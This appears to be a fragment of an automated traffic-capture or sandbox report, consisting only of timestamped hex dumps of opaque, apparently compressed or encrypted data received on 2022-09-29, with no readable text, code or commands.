                                                                                                                                                            2022-09-29 12:45:05 UTC12242INData Raw: c0 ba 4c af 3b da ff 7b 50 c9 91 38 69 74 9f 31 6e cd cc f7 a3 4d 02 5d 6a 25 8c a0 9b b9 12 b4 a9 d1 37 b2 b6 2e 28 cf 0c 55 da 5e 7f d0 5f f2 2f ca 24 78 bb 2e 74 fe 69 5c 9a 86 ef 7a 4a cf 6f b4 91 ac f9 7c 60 40 39 62 b7 0f 96 43 06 d2 78 4d 19 36 b8 b8 0a df 26 94 c0 a0 9b 23 92 f5 56 b6 2b bd 39 08 af fe 21 8e aa 21 b4 31 5e 35 85 71 f1 3e e4 f4 e4 75 a8 fa 20 51 3b d0 b7 47 90 c3 bd fd 1c a6 af ed 34 c4 18 b6 ef 57 6e 9f e4 9e 77 b5 29 53 77 12 42 d0 65 cb ce 52 96 e2 68 2d a0 55 b6 73 77 1e e3 94 0a 53 2a f1 68 78 74 4b 4b 14 f3 f4 a4 b9 60 6b 1c 3d 47 9f 5c ec 53 7e 3b c6 2b ca 19 af 9c c0 5d 23 1d 32 15 9f 63 dd 17 dc 28 22 8d 10 bf 0c 47 42 08 c6 03 e4 f1 e8 3a a0 9f 2f 21 22 73 7d 36 f1 dd 35 8f 2c b9 13 de 36 ab 05 57 84 45 08 54 4e d9 00 e7
                                                                                                                                                            Data Ascii: L;{P8it1nM]j%7.(U^_/$x.ti\zJo|`@9bCxM6&#V+9!!1^5q>u Q;G4Wnw)SwBeRh-UswS*hxtKK`k=G\S~;+]#2c("GB:/!"s}65,6WETN
                                                                                                                                                            2022-09-29 12:45:05 UTC12246INData Raw: 7e e8 98 93 b7 fe 19 2b e9 d9 56 3b 21 1b 1f fc d8 5c b1 ca 31 c7 3c 3c d9 85 2e 12 7e 10 5a 03 89 14 e5 cd 6c 33 84 4d 84 e6 d8 48 b6 1e a4 7e 66 38 34 bf e9 a0 97 1e bd fe b4 7e 26 08 d0 2b 82 a2 76 7b f3 b6 57 cb d9 21 07 9f 32 bc 60 49 31 c4 67 5b 56 df 11 fb 66 8b be 8e 79 a1 a0 c5 9b 34 a0 81 6d 1c 11 78 91 1e 12 56 16 72 10 04 29 ca b8 27 f1 23 af 16 bf fb 76 a7 e1 23 68 ac 8c bc f7 46 8d 6a c9 e6 da a3 32 ac 3f 24 ff 78 c5 c2 80 92 c2 27 77 36 f2 26 25 10 fb e0 48 23 98 5a 78 2e 38 94 e4 18 92 ad 5e 77 05 ee 49 5b 64 3f 9b 99 6f e9 d2 cd 34 cd 1d d5 b7 16 e7 b8 a5 86 03 f9 55 0f 31 ab 50 db 9c 83 bd 0f 20 71 6c 59 de 9a e2 ef b2 47 8b 26 3f 2b f5 b3 f2 f2 1d 4d 73 15 bf ea 61 4b 9a 68 34 47 c9 88 b3 5d ab 75 6d c4 2c ad 4e ab a1 1b 6e 59 ea 71 a6
                                                                                                                                                            Data Ascii: ~+V;!\1<<.~Zl3MH~f84~&+v{W!2`I1g[Vfy4mxVr)'#v#hFj2?$x'w6&%H#Zx.8^wI[d?o4U1P qlYG&?+MsaKh4G]um,NnYq
                                                                                                                                                            2022-09-29 12:45:05 UTC12262INData Raw: f7 59 52 62 e3 e0 f1 70 4f 3b 09 cc a7 ff 66 da cf f7 8c 41 75 b5 82 a5 73 03 38 a0 20 8e 23 e1 06 c0 48 27 1b 59 1f 46 f9 fe 5c 99 d5 37 75 d7 ef e2 3b c1 dd ed fc 9e 49 bf 03 26 69 71 e1 e9 9d 78 70 e4 20 76 8e 13 2d 0a f1 69 0c 4c 6b ff ae 41 37 34 e4 13 23 c0 a0 73 69 47 a1 24 94 7a cb 7a 46 85 74 3f 9a a0 38 b4 45 2c 78 1e fc ff 2a f9 f6 97 0e 12 89 e4 ed dd 09 51 78 3e 6e 08 46 13 7a 17 6c 11 8f 7a 63 3a 90 58 b4 d0 10 d0 cd 17 20 37 25 44 92 3e b8 a2 1e 6b 98 05 91 95 78 de ea 78 8f 77 9e 26 d5 62 ed b9 3d 61 01 32 6c 8d a3 5a e1 43 1d 2a 8f a0 ad 98 5a 3d 07 6a 10 ee e1 9c 0c e0 9b d4 a9 97 2c 26 a4 81 b0 e6 04 4b 95 c7 f8 25 cd 3e 23 42 ff fa ec e0 97 6a a1 9e 22 08 42 76 d5 d0 5f 42 56 91 bd 76 5d 39 28 2c 6f f9 d0 50 09 78 70 5b 9d 78 bb b6 e0
                                                                                                                                                            Data Ascii: YRbpO;fAus8 #H'YF\7u;I&iqxp v-iLkA74#siG$zzFt?8E,x*Qx>nFzlzc:X 7%D>kxxw&b=a2lZC*Z=j,&K%>#Bj"Bv_BVv]9(,oPxp[x
                                                                                                                                                            2022-09-29 12:45:05 UTC12278INData Raw: f8 0d 91 8e 06 04 df bf 14 71 a7 28 1c 74 8f 38 89 55 4d 02 8c 61 6e 91 81 a5 5f 73 9d 7b 77 b8 67 72 3a 07 0c 15 44 b2 58 9c 52 63 9c e4 8a 3d f9 6a da 23 4b d3 c2 02 87 fe f5 be a3 74 ad 48 2f 5d a6 ba 01 57 7b db d0 d5 a2 6b 6b 2a 56 81 80 da 52 91 2b d9 dd d4 e6 83 40 8a eb 26 32 19 af 88 cc 16 e8 1c 26 68 eb 57 59 9f e0 ef dc b6 55 38 97 85 6c 58 8a 14 23 b8 39 20 f4 b8 23 b8 04 f2 4c 83 16 76 28 8f ae d9 d6 75 d5 5c b8 04 09 d8 a1 08 63 8f fb 74 16 86 c1 11 c7 1f 3c 1a 3d 5d 82 ce a7 42 be df 74 52 cd 72 c4 b9 0c 62 40 dd 96 21 87 35 09 77 8d a3 fe ca c9 3f b7 09 d2 c3 47 eb 46 07 d0 f7 1c 4b 49 77 3c 8d 10 d9 62 fe 28 e2 07 aa 67 a9 e3 02 50 06 cb 9e 37 61 ad 90 5e b9 6b 4d 26 e8 4d d0 71 f8 d3 cf 30 f7 3d 7e 7e 5b 52 8b 9f 42 13 64 96 23 c4 b3 7e
                                                                                                                                                            Data Ascii: q(t8UMan_s{wgr:DXRc=j#KtH/]W{kk*VR+@&2&hWYU8lX#9 #Lv(u\ct<=]BtRrb@!5w?GFKIw<b(gP7a^kM&Mq0=~~[RBd#~
                                                                                                                                                            2022-09-29 12:45:05 UTC12294INData Raw: 80 1f b5 68 09 b1 34 b0 62 65 60 b2 80 34 43 b7 95 44 bf 36 ea e1 2f 13 23 bd 02 5e ea 5b 6f 46 2a 1f 54 0b a4 35 23 e2 7a 15 ef 99 c5 a0 e7 d5 f3 10 2f 21 f9 ba 66 e8 a9 5b 0f 52 e3 9b 88 73 ce a1 03 4f 8d c9 c0 f4 39 1e e9 de a7 e5 aa 6f b4 30 34 9f b2 50 df 90 64 0e d9 4c a5 5e 61 c8 ab f2 42 c9 a0 b1 82 f3 61 92 04 89 b4 cc 48 f2 0e d9 83 10 31 35 10 d0 5f a6 bd 66 58 7c 8b de 07 05 60 49 32 d3 de e2 29 f9 5b a9 39 ef 33 4e 5a 19 07 4e 1f 63 a5 18 ee aa e6 f5 01 51 04 8b 6a 27 74 38 17 c5 22 c8 5e 85 11 b2 0e 79 66 fb e2 03 72 c3 4d 44 59 ae 0a 24 58 a2 8a b3 f5 6b 78 02 ad fe c4 69 58 b7 88 f1 4f 3a 6d 8b 41 06 19 56 85 36 43 df 11 8c 5b 00 7b ec d1 da 65 62 23 62 df 9a e5 e3 df 16 97 f9 7e 18 dd b9 81 eb 59 d5 33 4c d1 ad b0 b4 20 d4 3a a9 3a 34 02
                                                                                                                                                            Data Ascii: h4be`4CD6/#^[oF*T5#z/!f[RsO9o04PdL^aBaH15_fX|`I2)[93NZNcQj't8"^yfrMDY$XkxiXO:mAV6C[{eb#b~Y3L ::4
                                                                                                                                                            2022-09-29 12:45:05 UTC12310INData Raw: 5e f7 ad 8e e1 d2 4b 35 19 1f 0a a3 ab a3 12 63 43 8d a9 35 0e 74 70 84 27 50 b7 e0 ab b4 69 d9 1a 2a 11 d3 2d da 05 c2 92 22 5b 54 58 6e e2 27 2c 01 03 87 43 c3 2d 74 1f 22 e2 d9 c8 fb 0b f7 fe b1 83 be e4 33 fe e9 d5 32 fe a0 9b 3b 4c 43 f8 13 2c e9 a8 ad 83 20 4e 86 5f 75 b5 32 28 d8 31 a3 69 8e a7 30 08 0a 11 88 7b 12 9f a3 04 0b 8d 92 f7 87 cf fb 8a 7c ac af 43 4e 8b 13 7d 54 3c a8 ed a0 62 dc 6e a4 6d 95 ba f6 2d 6b ed c5 ab 15 a6 fa 35 2d 99 ab 8c f5 72 92 70 86 fa bf ec d4 c1 c4 03 b3 c5 d1 77 a2 b1 c3 22 53 7e 75 72 93 dd 07 be e1 20 fb 00 d8 7b 13 35 94 5f e3 58 d5 e4 63 f6 26 0d ae fa ff ff 98 73 8f eb 82 da dc 14 62 17 76 80 94 ae af 75 5d 83 56 f1 70 a9 65 d1 c0 48 cc 85 9f 5c ff b4 c4 83 05 2a c9 71 50 81 49 29 ed 73 00 4e 10 e5 de 16 d9 d2
                                                                                                                                                            Data Ascii: ^K5cC5tp'Pi*-"[TXn',C-t"32;LC, N_u2(1i0{|CN}T<bnm-k5-rpw"S~ur {5_Xc&sbvu]VpeH\*qPI)sN
                                                                                                                                                            2022-09-29 12:45:05 UTC12326INData Raw: 14 02 c7 a4 a5 0a ca 5a 93 a8 74 25 73 70 08 ec 09 b4 37 a9 ad 86 36 a1 2f b1 d9 26 84 67 7f 4c 97 db fa c0 24 a6 c0 88 55 fe 09 13 b2 e6 56 50 b3 33 57 27 2b ad de 30 1e 14 13 5b 43 f0 85 f3 1a 2e 91 93 58 e5 e7 ea be 05 89 1a 1b 97 ed dc e4 86 50 f4 87 e3 c3 51 83 14 d2 f7 17 22 eb 97 84 40 9f 22 a4 dd d9 81 03 0c 62 3a 87 05 27 bb 46 e5 66 0f 1c ff 3f 49 11 41 9d 2e bf 01 7c b8 f9 79 4c 6b ae 91 75 f8 3b df 4b 0d 91 79 ec d4 12 64 66 5f b7 41 7e 8c 32 be 3c d3 c5 03 c7 ec d5 80 24 7a 97 d8 95 c9 2e f7 ff c8 cd 9b 5a 69 8f 66 ac 61 1f 31 07 a8 e4 69 d8 3c 0d cd bc 87 8b cd e0 99 c1 b2 de 42 13 10 3e d6 30 e2 d6 8d fe 3a ae 7e ea 9b cf 2d 45 66 c6 a0 24 ff 57 d0 a9 12 f5 54 2d c5 f1 18 63 9d a8 87 fb e6 6d 9d 9e 54 e0 ec d5 c6 f1 02 7b d1 05 c5 74 3d 56
                                                                                                                                                            Data Ascii: Zt%sp76/&gL$UVP3W'+0[C.XPQ"@"b:'Ff?IA.|yLku;Kydf_A~2<$z.Zifa1i<B>0:~-Ef$WT-cmT{t=V
                                                                                                                                                            2022-09-29 12:45:05 UTC12342INData Raw: 4a 3c 9e 4d 63 aa 9b ef 0b d3 bd 2b 65 60 74 d7 88 98 6e 81 cb a5 57 cc fa c0 3d e5 aa dd ca 85 48 a6 1b 31 39 90 31 4a 7a 3f af 0b 9f a5 15 6f 81 4b 08 59 1b 2d 6d c3 1d 91 9a 18 f4 84 39 d7 89 9a de ab 9b 71 5f 2d fb bc b5 80 4c b1 bb ff 5d 86 64 09 5d 0e d2 5f 03 c6 88 72 31 d8 a5 8c fe 37 84 df f3 d1 66 fa 04 a0 fc c6 99 58 ea 31 0e a4 6a 2d 00 fd c0 09 c4 b1 c1 68 4b b3 96 95 ed 66 e8 72 4b 1b 37 4c 4f 63 15 6a 2a db ee ff d9 76 4b 57 d3 11 9d 5a af 48 2b a3 d4 1c 5a c5 df 55 21 41 46 de 18 e6 42 77 19 5f 9c c9 a7 f6 b2 b0 b8 d5 97 75 1e 5b 12 1f 4f a1 74 63 ec a9 97 e4 81 35 51 47 6b 37 81 a7 b7 6e e7 3a 66 e6 3c 03 72 9f b3 b3 8b 41 9b a2 9f 2c e8 f6 ee 45 bc 9c 8a f3 57 e8 68 c5 7c ec 8c 4a d0 7e 25 42 8d c5 6e 0c d8 1b 18 2d 73 4f 53 11 1a 69 3c
                                                                                                                                                            Data Ascii: J<Mc+e`tnW=H191Jz?oKY-m9q_-L]d]_r17fX1j-hKfrK7LOcj*vKWZH+ZU!AFBw_u[Otc5QGk7n:f<rA,EWh|J~%Bn-sOSi<
                                                                                                                                                            2022-09-29 12:45:05 UTC12358INData Raw: 8a ca 99 11 59 ce ef 5a d1 c9 0b ef 14 7f 7d 25 56 9c c0 a3 63 32 f9 dc 88 08 33 71 e7 e2 2c 71 d5 5f 41 59 e0 ed 4e 32 dc 3d 27 51 f6 aa f9 9d b6 ab 97 a9 e7 4a b5 b2 a1 29 2d 91 c6 a4 21 8d f9 61 d5 f0 21 93 1f f0 bf 8e f3 1e e2 46 19 0c 9e 61 96 17 9c 6f 84 22 9a a3 8e 2d 8d 9b 34 00 58 42 75 24 16 98 2a b5 50 a9 a7 9f 1c a5 98 9b 54 3b 46 a1 e2 c1 a3 2c 31 a5 e5 bd 10 78 a1 52 9d 12 b2 23 55 55 bf 83 d3 c6 a3 30 cc 5a 12 1a f4 c4 88 ff b6 91 7a cb 71 04 28 1d 5a cc f7 6c c0 e5 f0 ca 00 3b 63 f6 22 a0 cf 0c 63 3b 23 62 fc 53 46 03 c8 09 54 d8 f8 8a 50 8e 12 f0 f4 a5 d0 69 64 24 dd e4 fa a8 c1 f0 3a 10 c3 bb 89 99 b7 97 d7 62 cc b5 2d c3 98 8a ff bc ae 5b eb 0d 6b c4 6e e1 e7 3a 8a 28 74 1c 8c b4 99 db d3 86 8d 89 d1 c8 f9 09 6f f4 f2 e2 c6 03 7f 72 eb
                                                                                                                                                            Data Ascii: YZ}%Vc23q,q_AYN2='QJ)-!a!Fao"-4XBu$*PT;F,1xR#UU0Zzq(Zl;c"c;#bSFTPid$:b-[kn:(tor
                                                                                                                                                            2022-09-29 12:45:05 UTC12374INData Raw: 85 c7 dd a7 e4 a3 b7 8a 4c 2b bc c8 f7 96 33 fe d9 ce c0 72 2b 81 55 8c f2 0b 6b ae 3d 23 b6 d4 81 ed 9e c7 04 80 95 3f 12 88 f0 a3 1a 7f 1d a9 86 07 43 10 ec 2f 4b c6 41 ed c6 f9 b2 b2 16 65 fe aa 9e ac 0a ba a4 50 5e 83 5b 4d 44 31 2a 73 84 cb 2f bc e5 eb 0f 37 31 2e 47 10 ee ae 4d 32 c6 d1 f9 15 4b a5 e7 71 3d 1a 99 af 6e 3d 54 2e 37 54 0f 46 49 bd 3e be b4 2c 18 5c d0 9a c2 59 8c 45 1c c1 c8 95 af f8 22 ed 6b 69 79 22 50 1a 3f 90 98 0d 7f f2 00 70 ce d1 73 3c df f2 1c b1 e0 e9 b3 3c 2b eb be b3 0e be 10 77 7f 89 c6 82 22 e4 77 8a 03 93 4f 72 c0 36 0b 6a 7d b8 88 49 b5 8a f2 a2 e3 44 f7 0a 2d 49 7c be 88 c4 ea aa 24 e1 30 eb d8 b5 c6 03 a3 66 e6 3d 5b 12 1a 87 7b 6a c1 38 ee a8 c3 73 43 1e 2c 16 08 d8 34 54 df 76 4b ce a0 4a 4d 74 52 4a c9 b0 07 2b b0
                                                                                                                                                            Data Ascii: L+3r+Uk=#?C/KAeP^[MD1*s/71.GM2Kq=n=T.7TFI>,\YE"kiy"P?ps<<+w"wOr6j}ID-I|$0f=[{j8sC,4TvKJMtRJ+
                                                                                                                                                            2022-09-29 12:45:05 UTC12390INData Raw: 66 60 f6 8c fb 3e ff 43 a8 c7 28 73 12 0e c2 14 a3 f8 02 c4 c6 c9 ff c7 00 7a 98 00 cb 46 04 af 79 96 47 c5 05 45 fc 75 47 9d 1a ec 26 6b 8a 47 cb c4 a2 49 db cb fa bc 33 00 9e 46 4c 5a 92 1a ea 83 84 6d 43 a7 79 e8 48 96 6a 16 90 a9 4d 69 44 15 50 c4 0d 11 1b 75 b7 70 26 b3 e9 33 b3 04 f3 04 46 ff f9 2c e4 9c cd a2 dc 7d 91 3d cd 49 d0 7e a1 e5 44 ce ae 58 1d 81 49 30 7e 1a b7 fe b2 cd 9d e7 1f 66 0e e1 4d ba 7d 7d fe 76 a6 b9 90 22 d4 a3 d4 05 46 3b 33 3e ac 34 b9 d4 d3 fe ef d5 80 e7 39 05 20 32 a0 fc 09 b3 68 cd c1 b0 cb bb 73 fc 26 24 67 fa 9c 44 9b e2 07 f2 32 a3 e4 d1 a7 c8 64 50 7b 55 4c 6a eb ed c8 ae f0 82 3d b3 54 3a 62 2f f2 31 93 dc 38 b7 6e 38 0c 1c ee 46 c5 75 e8 9d 1b 43 b6 a8 95 c2 60 f0 92 0e 2b 93 e9 93 64 87 5a a5 9c 91 06 8b b2 91 10
                                                                                                                                                            Data Ascii: f`>C(szFyGEuG&kGI3FLZmCyHjMiDPup&3F,}=I~DXI0~fM}}v"F;3>49 2hs&$gD2dP{ULj=T:b/18n8FuC`+dZ
                                                                                                                                                            2022-09-29 12:45:05 UTC12406INData Raw: ae 25 5c e0 a8 a9 46 a7 f5 79 75 ae c8 ec b2 03 f6 75 9f b7 b0 78 3f 81 66 b2 95 89 de 0b cb 19 a4 81 93 7a a5 ca 90 d4 b3 4e d0 f1 d2 61 56 ca 7b da d4 35 2b 2b 11 6f 2f 31 d6 53 9a 68 a1 95 2a 01 a9 7c da 58 1a 62 e4 bf 39 6c d6 f8 93 af 6a 9e e6 eb 24 3c 99 cf a2 a2 b9 e6 38 59 fb 8e 4e b2 fb 27 7f 93 69 47 06 95 69 71 3e 06 33 fb ad 4b c3 d9 b5 6d 1c f1 b4 7c 54 da 42 84 bf 9d 26 d8 12 48 f5 a4 1e a1 c7 56 f1 75 8a 65 f2 3b c3 5b 5d 96 93 3c b6 93 1d 2a fe 08 a2 f0 48 0e 54 bc 3f 8c cc e5 9a b5 ec 17 68 4b 64 42 ae 3e 32 af 5b 2f fb b4 04 af 50 92 32 60 a6 0b 58 41 ba 97 cb 2d 2c 80 cc 43 ef e4 b2 3a 17 9a 2e 10 e3 df 95 b9 40 a2 74 e9 59 2f ce ae a3 cd 6d 3f 71 51 af 45 78 07 9d c3 3c d1 6a 2a ae 7e c5 ac 7f c5 5a 88 65 c7 8d bb de a8 8e 36 0d 5d 67
                                                                                                                                                            Data Ascii: %\Fyuux?fzNaV{5++o/1Sh*|Xb9lj$<8YN'iGiq>3Km|TB&HVue;[]<*HT?hKdB>2[/P2`XA-,C:.@tY/m?qQEx<j*~Ze6]g
                                                                                                                                                            2022-09-29 12:45:05 UTC12422INData Raw: 9c dd a2 b7 ac 9c 74 3c b9 a8 9b c0 b8 9c 39 14 df a2 a2 96 d6 92 80 f0 00 a9 ce 21 15 e9 bc 25 90 d5 2c 56 39 52 28 04 35 ea ca e7 33 3b 48 73 3b a5 73 1e ae f5 c5 ba b3 13 f2 a1 12 14 84 86 8e 61 02 12 42 a1 2f 17 4e 71 0d f8 a9 85 94 0e 1a 3a 8b b0 9e 31 cb 60 ff 37 27 40 fb e6 8c df 6e 68 b6 e3 0e 23 ea 12 be f0 e3 bd b1 a6 8f 08 53 91 04 5a 8b e2 10 9b e0 17 0f 97 99 ff b9 88 3a ac 9e 7e 52 6a 24 60 2e 58 62 76 c8 ac aa 6f 07 83 01 26 f3 6a d9 d0 2a d0 e8 5c 8d c3 70 b7 d8 b0 39 b6 5a ae 4f 81 d5 d1 70 0c 39 fe d1 45 37 f8 d8 fb ee cf a7 26 a4 36 73 36 c4 61 82 98 61 68 ae b6 f8 95 66 3c 77 99 51 e3 82 38 50 cd d1 38 aa 1d 4e 2e e8 a5 40 f5 ed d5 d3 fe b2 e8 3d fd ab a3 6b de 02 73 4d 1a 84 88 d4 7c 29 31 4e 9c fb 93 61 11 c6 b4 1d 5e 22 bc 08 5c 8f
                                                                                                                                                            Data Ascii: t<9!%,V9R(53;Hs;saB/Nq:1`7'@nh#SZ:~Rj$`.Xbvo&j*\p9ZOp9E7&6s6aahf<wQ8P8N.@=ksM|)1Na^"\
                                                                                                                                                            2022-09-29 12:45:05 UTC12438INData Raw: 08 09 fc 06 fc 4e 5d a6 6b 20 ce 53 4a 6f e1 da b4 b7 40 2d b7 e7 8f e6 df 37 c4 dd b2 97 8d 55 ff 68 0d 66 8b 96 28 24 e8 9a f8 a0 9a 2d f5 c4 6a aa df 32 f7 2c 08 bc a6 55 57 d8 33 28 3a 47 d2 ec 2c 05 32 67 0d 29 cf 85 d1 f5 b0 39 c4 77 d9 39 d8 dd ce 67 ca 30 4a d6 14 50 34 c6 c0 ea df 01 95 86 06 f0 91 27 bf 6b 82 8d 4e 2a e9 6b 83 07 a1 8e 3a 8f 4e 6d f9 39 5a a0 9a 09 83 44 f3 58 1b 81 a8 42 7e 29 02 e8 df 59 7f c0 96 6e ed 80 db e5 33 b2 9b 42 0a 91 2b 83 89 58 8e f7 23 30 7f 4e 9b aa c0 fb be 58 67 55 76 71 3e 39 48 cb 8e 52 26 02 11 b3 be 83 49 35 c4 09 c2 e1 a2 14 85 df e0 9b 0a d3 31 18 ff 22 48 fa 4e e4 33 a8 30 22 10 9b 21 fd 7f f4 16 15 32 03 f1 17 f3 84 a9 49 e3 93 f9 76 df fa 9f 8a ef 15 87 af 40 07 17 79 0b 69 17 aa 59 6f 34 9b ef a4 e1
                                                                                                                                                            Data Ascii: N]k SJo@-7Uhf($-j2,UW3(:G,2g)9w9g0JP4'kN*k:Nm9ZDXB~)Yn3B+X#0NXgUvq>9HR&I51"HN30"!2Iv@yiYo4
                                                                                                                                                            2022-09-29 12:45:05 UTC12454INData Raw: ab 42 d5 a9 63 d4 90 d1 ab 99 12 99 8b 82 d7 6b ba 5b 86 20 a7 0f ff f4 f8 b0 63 b7 09 04 b7 79 df e6 69 6d 57 76 54 4a 2f 9c 5d 4e 48 4d 71 58 7a 73 66 c3 18 2a 9d 13 9d 82 f2 b4 a7 64 57 cd d6 9b dc 4a de dd 9c f1 00 42 d5 6a d7 a4 28 34 23 37 13 5c 32 92 97 98 ec d2 60 43 63 96 17 e0 6e 6a c2 0a 05 24 c9 97 60 44 02 56 e3 d3 66 15 dc e6 58 09 fb 9e 23 76 ac 20 8b 28 a3 7f ce d6 c9 1b fb c4 ef b6 5f 27 ef 4f cb af 73 3e 12 26 ca e7 9b f1 31 47 d6 7c f9 7e 44 dd c1 ee cb 34 77 50 bd 7d 77 2b 38 17 f8 73 21 4b e6 43 e4 f9 fe b1 64 ab a1 9e 4d a4 5e 18 7a e1 8f be 21 44 e6 cf 9a 85 56 72 b1 51 a8 f2 0d 26 27 c8 1f 68 d1 e7 41 59 c7 9c 5c 5d a8 36 6c fc 55 c1 a6 03 26 53 ef 7e 6f bc 41 75 a8 ac 19 57 4c ec 41 46 47 d8 6c cb 1a f0 6b 71 a0 de a1 24 7e 7f 08
                                                                                                                                                            Data Ascii: Bck[ cyimWvTJ/]NHMqXzsf*dWJBj(4#7\2`Ccnj$`DVfX#v (_'Os>&1G|~D4wP}w+8s!KCdM^z!DVrQ&'hAY\]6lU&S~oAuWLAFGlkq$~
                                                                                                                                                            2022-09-29 12:45:05 UTC12470INData Raw: 91 d4 fb 94 98 5b 73 44 84 b0 91 27 ff 83 2d 9a 40 31 bf 8e 35 4a 2b f5 7f 21 cd 25 9d 49 9e c3 c0 35 05 0c bb 02 d4 e6 b1 ed 2e 99 87 dd de 17 3b a4 60 45 03 f1 10 e3 d2 ae 9b f5 7e 49 15 49 6a 2d b8 f6 80 c0 0d cb ad 08 93 92 64 3e af d3 4e 7a 10 48 80 6d 2b d8 d4 35 b8 c4 47 84 39 7e 97 e5 2f 58 e8 51 7c b2 05 67 e9 e7 65 32 5e ec 37 ee 00 09 3e 67 2a d4 65 bf f5 64 8c 9f 4c c5 c8 cf e0 72 04 5e 5b f2 1e 79 15 e6 bc e0 44 a8 62 d4 01 d6 60 b2 5a 87 aa 1f a2 64 1f 12 2b ea 23 65 f4 67 d3 0c d6 88 a5 9d 25 1d 0b e0 df e8 77 55 50 55 72 6b e7 60 11 6c 8a 5e d4 7f ce af 89 41 4e 84 2e 28 e4 6e bf e9 ed ea f5 5b 19 16 4b f7 a1 d2 92 70 6a 31 1b 74 a2 94 e8 5d 1d e9 11 5f 06 13 c4 72 44 f5 1f 9b 55 11 c2 8c fe df ce 24 f8 a4 48 f0 77 b3 1b 9e 97 19 de 60 06
                                                                                                                                                            Data Ascii: [sD'-@15J+!%I5.;`E~IIj-d>NzHm+5G9~/XQ|ge2^7>g*edLr^[yDb`Zd+#eg%wUPUrk`l^AN.(n[Kpj1t]_rDU$Hw`
                                                                                                                                                            2022-09-29 12:45:05 UTC12486INData Raw: 1b 8f 6c a4 88 b6 83 9f db 42 74 30 ae 4d 09 2c ca f8 cb 42 47 75 96 87 9b ed 80 48 eb 8f a6 e2 49 4a b0 4f 97 22 28 c7 ca 40 fa c9 e7 aa 00 a3 e8 90 82 fa 74 1f 9c d9 14 08 0f 11 9f 5c 91 56 16 87 5d b2 91 b1 c7 d7 38 f6 37 9f 26 fa 5e 76 15 c7 2d 14 ac 3f 25 0e 63 f3 6d 38 99 ec 1b 5f e7 f9 d6 bb d4 ee 13 f6 22 60 61 46 82 4e 69 56 79 c3 b7 33 98 ce 84 9c 84 1e 28 23 7a 34 95 68 3b 00 7c 1d 2b dd dc 90 1b 1f e6 8a 7d 9e 9b 27 c1 57 19 c6 88 ba b9 82 84 1f 92 07 ea ea 26 e8 8b bd ac 69 fe 4b fc 99 95 5c 29 f5 c3 7a af b7 9b 15 85 f5 b0 40 46 64 ce 5e 97 ad 84 99 17 be c2 e2 1d 8c 92 4f 15 49 db f8 3d 35 3b ca 21 5c 36 70 4d f9 73 e0 a3 ea 6f 48 26 c0 73 2a 6a 71 80 64 4e 5e 1a 5c 30 25 49 ce 57 20 85 cc 08 68 41 00 13 de c1 d6 4d cb f6 68 7d 73 69 85 61
                                                                                                                                                            Data Ascii: lBt0M,BGuHIJO"(@t\V]87&^v-?%cm8_"`aFNiVy3(#z4h;|+}'W&iK\)z@Fd^OI=5;!\6pMsoH&s*jqdN^\0%IW hAMh}sia
                                                                                                                                                            2022-09-29 12:45:05 UTC12502INData Raw: b3 66 fc 77 8c 26 d2 b2 1a 97 03 1d fc ef 19 fc 33 db 8e 0e d7 80 60 df 7e 48 a7 d8 ca 93 b0 e0 bf bd af 5f 79 56 c7 90 e7 a0 a5 25 c8 f2 9d e5 c7 91 99 e2 f9 9e c2 5f 76 0b 54 cf b7 7e 6f 5f 7b 31 03 97 92 95 56 76 c5 f7 43 a1 a2 4d 6d 8d d2 dd 87 9a 1e 25 d8 c7 5b ec 73 d8 d6 7d 18 78 11 d5 46 fc 4b 3f 76 b5 cf 0b 17 04 7e dd 0c 49 85 33 f9 99 b3 81 9a 20 e6 f4 fc 33 c0 c2 9e e0 4a dc ac 60 6d 60 1a b3 7e a4 37 d0 5b e8 b5 ae 4b 44 d6 9d 65 b1 a9 1c 4a 0a 40 51 bf b2 f3 ba 20 87 a2 14 23 69 7f 42 bf 19 e7 36 5d 65 6b 0b 0b 31 c4 3d 1d 6a 22 ef 37 a1 e1 87 d0 d6 68 7a ef 29 b4 d5 a9 5d cf 3f 3f e0 49 b4 2c a1 38 a8 bc a9 20 b2 23 31 e5 94 9f f8 46 70 63 75 9a 3a 1d d3 6e d1 a7 7a 55 70 5c 8a e9 1c 7b a5 df e9 91 5e a4 b7 89 12 38 c2 b5 72 41 63 f2 7b 0d
                                                                                                                                                            Data Ascii: fw&3`~H_yV%_vT~o_{1VvCMm%[s}xFK?v~I3 3J`m`~7[KDeJ@Q #iB6]ek1=j"7hz)]??I,8 #1Fpcu:nzUp\{^8rAc{
                                                                                                                                                            2022-09-29 12:45:05 UTC12518INData Raw: a3 51 47 c0 6c 3a 04 55 70 08 3c ad da 7a dc 8c 65 df d4 39 9f 7c d3 44 04 10 fb 8f 05 1d 8d 66 04 af a4 ce 50 f5 54 d6 6d 34 22 64 d7 6d 0b cd 72 dd 73 78 ef c0 4b 6f ff 27 38 83 b1 2c a3 54 0d 80 85 41 0b 4b de 5f 30 ce 41 45 46 bb 9d 3a 84 4b 74 b2 d0 9c 81 8f f6 75 44 eb fc f5 ca 23 ee 0e 4b eb ef 44 7e b8 9f e7 7b 3c 0a cc 2d 43 c4 cf fa 40 4a b4 03 16 75 d9 f5 89 54 45 4a 07 b4 33 cc 3f 22 77 0a 7b 53 50 af 52 59 44 c8 5c eb 81 94 89 ed 34 0e b2 52 2d 0f 33 51 bb 6c 63 9a dd 47 78 8d 6e f1 25 0b 29 37 90 7b 24 85 9c 74 aa 27 a2 67 bb ee 3f 50 c3 21 0f bc 4c 76 80 de 6b 55 4f 94 af 0b ce 49 fa ac e3 32 d1 44 ed 2c e2 cd e5 e6 fe db 0a a8 7f b7 94 c2 15 4e 51 30 30 04 ca 37 8f f2 f5 8b dc 71 36 94 cd 4c 05 73 be 83 54 47 c4 a5 36 66 51 7b 90 3b 3d 28
                                                                                                                                                            Data Ascii: QGl:Up<ze9|DfPTm4"dmrsxKo'8,TAK_0AEF:KtuD#KD~{<-C@JuTEJ3?"w{SPRYD\4R-3QlcGxn%)7{$t'g?P!LvkUOI2D,NQ007q6LsTG6fQ{;=(
